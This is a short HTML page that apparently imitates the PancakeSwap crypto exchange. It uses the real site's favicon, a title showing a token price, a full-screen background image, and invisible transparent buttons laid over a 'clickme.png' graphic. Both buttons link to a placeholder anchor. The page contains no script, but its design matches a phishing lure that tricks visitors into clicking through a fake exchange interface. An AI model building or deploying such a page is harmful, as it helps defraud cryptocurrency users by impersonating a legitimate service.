<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
  "http://www.w3.org/TR/html4/loose.dtd">    
<html>

<head>
<link rel="shortcut icon" href="https://pancakeswap.finance/favicon.ico" />
<title>Exchange | PancakeSwap - $13.66</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<style>

 
 body {background-image: url("wp-pic.png");
 min-height: 500px;
  background-attachment: fixed;
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
  color:rgb(108, 123, 139)	;
  background-repeat: no-repeat;
  }
  
 .X-set {  background-image: url('clickme.png');
height:498px; width:400px;
  background-position: center;
  background-repeat: no-repeat;
  background-size: 430px;
  
  margin-left:800px;
  border:none;
  margin-top:0px;
  }
  .linktop {margin-left:290px; }
  .button_top {background-color: transparent; color:transparent; font-family:vardana; border:hidden; border-radius:12px; height:30px; width:125px;}
  
  .linkbottom {margin-left:26px; }
  .button_bottom {background-color: transparent; color:transparent; font-family:vardana; border:hidden; border-radius:12px; height:40px; width:245px; margin-top:400px;}
</style>
</head>

<body>
<fieldset class="X-set">
<a href="#kffk.cm" class="linktop"><b><button class="button_top">.</button></b></a><br>


<a href="#kffk.cm" class="linkbottom"><b><button class="button_bottom">.</button></b></a><br>

</fieldset>



</body>
</html>                
